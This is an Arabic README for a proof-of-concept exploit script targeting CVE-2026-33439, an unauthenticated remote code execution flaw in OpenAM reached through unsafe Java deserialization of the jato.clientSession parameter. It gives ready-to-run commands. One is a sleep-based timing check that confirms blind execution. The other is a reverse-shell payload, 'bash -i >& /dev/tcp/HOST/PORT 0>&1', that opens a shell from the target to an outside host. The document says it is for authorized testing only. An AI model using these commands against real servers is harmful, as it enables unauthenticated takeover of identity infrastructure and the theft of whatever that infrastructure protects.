
PoC لـ CVE-2026-33439، ثغرة RCE قبل المصادقة في OpenAM عبر إلغاء تسلسل Java غير الآمن.
تنفيذ تعليمات برمجية عن بُعد (RCE) قبل المصادقة في OpenIdentityPlatform OpenAM عبر إلغاء تسلسل Java غير الآمن لمعامل
jato.clientSession. المتأثر <= 16.0.5، وتم إصلاحه في 16.0.6.
الإشعار الأمني: https://github.com/OpenIdentityPlatform/OpenAM/security/advisories/GHSA-2cqq-rpvq-g5qj
time ./cve-2026-33439.py --url https://TARGET/openam --command 'sleep 3' # takes about 3 seconds
./cve-2026-33439.py --url https://TARGET/openam --command 'bash -i >& /dev/tcp/HOST/PORT 0>&1'
المخرجات عمياء. يظل الطلب محظورًا حتى ينتهي الأمر، لذا يؤكد التوقيت
التنفيذ (--command 'sleep 5' يستغرق حوالي 5 ثوانٍ).
لاختبارات الأمان المصرّح بها فقط.